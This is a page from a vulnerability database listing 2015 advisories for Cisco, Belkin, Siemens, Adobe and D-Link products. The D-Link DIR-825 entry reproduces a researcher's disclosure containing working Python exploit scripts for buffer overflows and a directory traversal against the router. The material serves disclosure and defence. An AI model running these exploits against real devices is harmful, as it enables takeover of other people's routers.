VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201507-0510 CVE-2015-4281 Cisco WebEx Meetings Server Vulnerable to cross-site request forgery CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in Cisco WebEx Meetings Server 2.5 MR1 allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCus56150 and CSCus56146. An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. This issue is being tracked by Cisco Bug IDs CSCus56150 and CSCus56146. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
VAR-201507-0512 CVE-2015-4284 ASR 9000 Runs on the device Cisco IOS XR of Concurrent Data Management Replication Service disruption in the process (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Concurrent Data Management Replication process in Cisco IOS XR 5.3.0 on ASR 9000 devices allows remote attackers to cause a denial of service (BGP process reload) via malformed BGPv4 packets, aka Bug ID CSCur70670. Cisco IOS XR is a member of the Cisco IOS Software family that uses a microkernel-based operating system architecture. An attacker can exploit this issue to cause the affected process to reload, resulting in a denial of service (DoS) condition. This issue is being tracked by Cisco Bug ID CSCur70670. The vulnerability is caused by the program not correctly handling malformed BGPv4 packets
VAR-201508-0254 CVE-2015-5536 Belkin N300 Dual-Band Wi-Fi Range Extender Vulnerability to execute arbitrary commands in firmware CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Belkin N300 Dual-Band Wi-Fi Range Extender with firmware before 1.04.10 allows remote authenticated users to execute arbitrary commands via the (1) sub_dir parameter in a formUSBStorage request; pinCode parameter in a (2) formWpsStart or (3) formiNICWpsStart request; (4) wps_enrolee_pin parameter in a formWlanSetupWPS request; or unspecified parameters in a (5) formWlanMP, (6) formBSSetSitesurvey, (7) formHwSet, or (8) formConnectionSetting request. Authentication is required to exploit this vulnerability.The specific flaw exists within the handling of formUSBStorage requests. It is possible to inject arbitrary operating system commands when the application is handling the sub_dir parameter. A remote attacker can leverage this vulnerability to execute remote code under the context of the root user. The Belkin N300 Dual-Band Wi-Fi Range Extender is a dual-band wireless expansion router product. Failed exploit attempts may result in denial-of-service conditions
VAR-201507-0369 CVE-2015-4111 BlackBerry Link Unspecified third-party codec demultiplexer mc_demux_mp4_ds.ax Vulnerable to arbitrary code execution CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
mc_demux_mp4_ds.ax in an unspecified third-party codec demux in BlackBerry Link before 1.2.3.53 with installer before 1.1.0.22 allows remote attackers to execute arbitrary code via a crafted MP4 file. BlackBerry Link is software that centrally manages devices, whether it's updating, synchronizing, or switching to a new device. BlackBerry Link is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial-of-service conditions
VAR-201507-0711 No CVE Design flaw in Dahua camera ddns setting CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Zhejiang Dahua Technology Co., Ltd. is a leading supplier of surveillance products and solution services, providing leading series of video storage, front-end, display control, and intelligent transportation products to the world. There is a security vulnerability in the Dahua camera ddns setting, allowing attackers to use the vulnerability to change and delete the dns record of the camera on the server at will, causing users to conduct phishing website attacks when using the domain name for camera access.
VAR-201507-0533 CVE-2015-4245 Cisco WebEx Training Center Cross-Site Scripting Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue in customer-controlled software. Notes: none. Cisco WebEx Training Center is an online training solution from Cisco. A cross-site scripting vulnerability exists in Cisco WebEx Training Center that allows remote attackers to inject arbitrary web scripts or HTML with an unspecified value. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCut92274. The program provides a wealth of tools for online classrooms, online training, and online exams
VAR-201507-0511 CVE-2015-4283 Cisco Videoscape Policy Resource Manager Service disruption in (DoS) Vulnerabilities CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco Videoscape Policy Resource Manager (PRM) 3.5.4 allows remote attackers to cause a denial of service (CPU and memory consumption, and TCP service outage) via (1) a SYN flood or (2) another type of TCP traffic flood, aka Bug IDs CSCuu35104 and CSCuu35128. Cisco Videoscape Policy Resource Manager is prone to a denial-of-service vulnerability. A remote attacker can exploit this issue to exhaust system resources and cause a denial-of-service condition. This issue being tracked by Cisco Bug ID's CSCuu35104 and CSCuu35128. The software supports capturing session, resource and policy information across QAM and IP environments. There is a security vulnerability in Cisco Videoscape PRM 3.5.4, which is caused by the program not properly handling TCP packets
VAR-201507-0508 CVE-2015-4279 Cisco UCS B series Blade Server Runs on the device Cisco Unified Computing System of Manager Vulnerability gained privileges in components CVSS V2: 7.2
CVSS V3: -
Severity: HIGH
The Manager component in Cisco Unified Computing System (UCS) 2.2(3b) on B Blade Server devices allows local users to gain privileges for executing arbitrary CLI commands by leveraging access to the subordinate fabric interconnect, aka Bug ID CSCut32778. Cisco Unified Computing System Manager is prone to a local arbitrary command-injection vulnerability because it fails to properly sanitize user-supplied input. A local attacker may leverage this issue to to inject and execute arbitrary commands, which could result in complete system compromise. This issue being tracked by Cisco Bug ID CSCut32778. Manager is one of the management components
VAR-201507-0535 CVE-2015-4247 Cisco WebEx Meeting Center admin site Component Cross-Site Scripting Vulnerability CVSS V2: -
CVSS V3: -
Severity: MEDIUM
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue in customer-controlled software. Notes: none. Cisco WebEx Meeting Center is prone to an unspecified HTML-injection vulnerability because it fails to sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCuv01971. Cisco WebEx Meeting Center is an online meeting product in a set of WebEx meeting solutions of Cisco (Cisco). The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML
VAR-201507-0534 CVE-2015-4246 ** Delete ** Cisco WebEx Meeting Center Vulnerable to cross-site scripting CVSS V2: -
CVSS V3: -
Severity: MEDIUM
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue in customer-controlled software. Notes: none. Cisco WebEx Meeting Center Contains a cross-site scripting vulnerability. Vendors have confirmed this vulnerability Bug ID CSCuv01955 It is released as.By any third party through any unspecified value Web Script or HTML May be inserted. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuv01955. The product invites others to join the meeting via email or instant messaging (IM), enabling online product demonstrations, information sharing, and more. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML
VAR-201507-0039 CVE-2015-5374 Siemens SIPROTEC 4 Denial of service vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
A vulnerability has been identified in Firmware variant PROFINET IO for EN100 Ethernet module : All versions < V1.04.01; Firmware variant Modbus TCP for EN100 Ethernet module : All versions < V1.11.00; Firmware variant DNP3 TCP for EN100 Ethernet module : All versions < V1.03; Firmware variant IEC 104 for EN100 Ethernet module : All versions < V1.21; EN100 Ethernet module included in SIPROTEC Merging Unit 6MU80 : All versions < 1.02.02. Specially crafted packets sent to port 50000/UDP could cause a denial-of-service of the affected device. A manual reboot may be required to recover the service of the device. Siemens SIPROTEC 4 and SIPROTEC Compact Device EN100 Module firmware has a service disruption (DoS) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. http://cwe.mitre.org/data/definitions/19.htmlBy a third party UDP port 50000 Denial of service via the above crafted packets (DoS) There is a possibility of being put into a state. The SIPROTEC 4 and SIPROTEC devices offer a wide range of integrated protection, control, measurement and power substation automation functions; the EN100 module is used for IEC 61850 communication. The EN100 module for multiple Siemens SIPROTEC products are prone to a denial-of-service vulnerability. Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. Both Siemens SIPROTEC 4 and SIPROTEC Compact are products of Siemens, Germany. Siemens SIPROTEC 4 is a series of multifunctional relays with a friendly man-machine interface. SIPROTEC Compact is a microcomputer protection device. EN100 is one of the multi-format encoder modules
VAR-201507-0645 No CVE Multiple D-Link Product UPnP Buffer Overflow Vulnerabilities CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal issue exists which can be exploited Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of authentication as low privileged user atleast to exploit directory traversal. ## Details Buffer overflow in auth ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' buf = "GET /dws/api/Login?test=" buf+="B"*251 buf+="CCCC" #s0 buf+="FFFF" #s1 buf+="FFFF" #s2 buf+="FFFF" #s3 buf+="XXXX" #s4 buf+="HHHH" #s5 buf+="IIII" #s6 buf+="JJJJ" #s7 buf+="LLLL" buf+="\x2a\xbc\x8c\xa0" # retn address buf+="C"*24 # buf+="sh;;" buf+="K"*20 buf+="\x2a\xc0\xd2\xa0" #s1 buf+="\x2a\xc0\xd2\xa0" #s1 buf +="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCC" buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml +xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Buffer overflow in HNAP ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' buf = "POST /HNAP1/ HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: uid:1111;\r\n" buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Directory traversal ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' Useful to do directory traversal attack which is possible in html_response_page variable below which prints the conf file, but theoretically any file, most likely only after login accessible ''' payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l og_pass=test3&graph_code=63778&session_id=test5&test=test" buf = "POST /apply.cgi HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: session_id=test5;\r\n" buf+="Content-Length: "+str(len(payload))+"\r\n\r\n" buf+=payload+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Buffer overflow in ping ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_ ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test" buf = "POST /ping_response.cgi HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: session_id=test5;\r\n" buf+="Content-Length: "+str(len(payload))+"\r\n\r\n" buf+=payload+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
VAR-201507-0107 CVE-2015-5124 Adobe Flash Player and Adobe AIR Vulnerable to arbitrary code execution CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Adobe Flash Player before 13.0.0.302 and 14.x through 18.x before 18.0.0.203 on Windows and OS X and before 11.2.202.481 on Linux, Adobe AIR before 18.0.0.180, Adobe AIR SDK before 18.0.0.180, and Adobe AIR SDK & Compiler before 18.0.0.180 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, and CVE-2015-4431. This vulnerability CVE-2015-3117 , CVE-2015-3123 , CVE-2015-3130 , CVE-2015-3133 , CVE-2015-3134 ,and CVE-2015-4431 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Failed exploit attempts will likely result in denial-of-service conditions. Security flaws exist in several Adobe products. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.508" References ========== [ 1 ] CVE-2015-3107 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3107 [ 2 ] CVE-2015-5122 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5122 [ 3 ] CVE-2015-5123 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5123 [ 4 ] CVE-2015-5124 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5124 [ 5 ] CVE-2015-5125 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5125 [ 6 ] CVE-2015-5127 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5127 [ 7 ] CVE-2015-5129 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5129 [ 8 ] CVE-2015-5130 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5130 [ 9 ] CVE-2015-5131 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5131 [ 10 ] CVE-2015-5132 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5132 [ 11 ] CVE-2015-5133 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5133 [ 12 ] CVE-2015-5134 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5134 [ 13 ] CVE-2015-5539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5539 [ 14 ] CVE-2015-5540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5540 [ 15 ] CVE-2015-5541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5541 [ 16 ] CVE-2015-5544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5544 [ 17 ] CVE-2015-5545 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5545 [ 18 ] CVE-2015-5546 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5546 [ 19 ] CVE-2015-5547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5547 [ 20 ] CVE-2015-5548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5548 [ 21 ] CVE-2015-5549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5549 [ 22 ] CVE-2015-5550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5550 [ 23 ] CVE-2015-5551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5551 [ 24 ] CVE-2015-5552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5552 [ 25 ] CVE-2015-5553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5553 [ 26 ] CVE-2015-5554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5554 [ 27 ] CVE-2015-5555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5555 [ 28 ] CVE-2015-5556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5556 [ 29 ] CVE-2015-5557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5557 [ 30 ] CVE-2015-5558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5558 [ 31 ] CVE-2015-5559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5559 [ 32 ] CVE-2015-5560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5560 [ 33 ] CVE-2015-5561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5561 [ 34 ] CVE-2015-5562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5562 [ 35 ] CVE-2015-5563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5563 [ 36 ] CVE-2015-5564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5564 [ 37 ] CVE-2015-5965 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5965 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201508-01 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
VAR-201507-0509 CVE-2015-4280 Cisco Prime Collaboration Assurance Service disruption in (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco Prime Collaboration Assurance 10.0 allows remote attackers to cause a denial of service (HTTP service outage) via a crafted HTTP request, aka Bug ID CSCum38844. Cisco Prime Collaboration is prone to a denial-of-service vulnerability. A remote attacker can exploit this issue to cause the web interface on a targeted system to become unresponsive, resulting in a denial-of-service condition. This issue being tracked by Cisco Bug ID CSCum38844. This solution supports simplified unified communication and video collaboration network management through a unified management console, and rapid deployment of communication sites
VAR-201507-0726 No CVE SAP Sybase Adaptive Server Enterprise XP Server Authorization Bypass Vulnerability CVSS V2: -
CVSS V3: -
Severity: -
SAP Sybase Adaptive Server Enterprise is prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access. This may aid in further attacks.
VAR-201507-0241 CVE-2015-0725 Cisco Videoscape Distribution Suite Service Broker and Videoscape Distribution Suite for Internet Streaming Service disruption in (DoS) Vulnerabilities CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Cisco Videoscape Distribution Suite Service Broker (aka VDS-SB), when a VDSM configuration on UCS is used, and Videoscape Distribution Suite for Internet Streaming (aka VDS-IS or CDS-IS) before 3.3.1 R7 and 4.x before 4.0.0 R4 allow remote attackers to cause a denial of service (device reload) via a crafted HTTP request, aka Bug IDs CSCus79834 and CSCuu63409. Vendors have confirmed this vulnerability Bug ID CSCus79834 ,and CSCuu63409 It is released as.Skillfully crafted by a third party HTTP Service disruption via request ( Device reload ) There is a possibility of being put into a state. Multiple Cisco products are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the affected device to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug IDs CSCus79834 and CSCuu63409. The former is a set of dual solutions for business integration of content distribution network (CDN) service brokers and CDN service selection for caching and routing across multiple CDNs. The latter is a Cisco Content Delivery System network streaming solution. A denial of service vulnerability exists in Cisco VDS-SB and VDS-IS versions prior to 3.3.1 R7 and versions prior to 4.0.0 R4 running on the Cisco Unified Computing System platform due to the program not properly validating input
VAR-201507-0504 CVE-2015-4274 Cisco Unified Intelligence Center of Web Cross-site request forgery vulnerability in framework CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified Intelligence Center 10.0(1) and 10.6(1) allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCuu94862 and CSCuu97936. Vendors have confirmed this vulnerability Bug ID CSCuu94862 and CSCuu97936 It is released as.A third party may be able to hijack the authentication of any user. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. This issue is being tracked by Cisco Bug IDsCSCuu94862 and CSCuu97936. The platform provides functions such as report-related business data and comprehensive display of call center data
VAR-201507-0505 CVE-2015-4275 Cisco ASR 5000 Runs on device software Packet Data Network Gateway Service disruption in components (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Packet Data Network Gateway (aka PGW) component on Cisco ASR 5000 devices with software 18.0.0.59167 and 18.0.0.59211 allows remote attackers to cause a denial of service via a malformed header in a GTPv2 packet, aka Bug ID CSCut11534. Vendors have confirmed this vulnerability Bug ID CSCut11534 It is released as.By a third party GTPv2 Denial of service via malformed headers in packets (DoS) There is a possibility of being put into a state. The Cisco ASR 5000 Series is a carrier-grade platform for deploying high-demand 3G networks and migrating to Long Term Evolution (LTE). An attacker can exploit this issue to cause the GTPv2 service on an affected device to become unresponsive, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCut11534. Cisco ASR 5000 Series is the 5000 series wireless controller products of Cisco (Cisco)
VAR-201507-0506 CVE-2015-4276 Cisco WebEx Meetings Server Vulnerable to arbitrary code execution CVSS V2: 6.5
CVSS V3: -
Severity: MEDIUM
Cisco WebEx Meetings Server 2.5MR1 allows remote authenticated users to execute arbitrary code via a crafted command parameter, aka Bug ID CSCus56138. An attacker can exploit this issue to execute arbitrary code on the affected system. This may aid in further attacks. This issue being tracked by Cisco Bug ID CSCus56138. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution. There is a security vulnerability in CWMS 2.5MR1 version
VAR-201507-0507 CVE-2015-4278 Cisco E Email Security Service disruption in appliance device software (DoS) Vulnerabilities CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cisco Email Security Appliance (ESA) devices with software 8.5.6-106 and 9.5.0-201 allow remote attackers to cause a denial of service (per-domain e-mail reception outage) by placing malformed DMARC policy data in DNS TXT records for a domain, aka Bug ID CSCuv14806. Cisco Email Security Appliance is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to stop receiving email messages, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCuv14806. The appliance offers spam protection, email encryption, data loss prevention, and more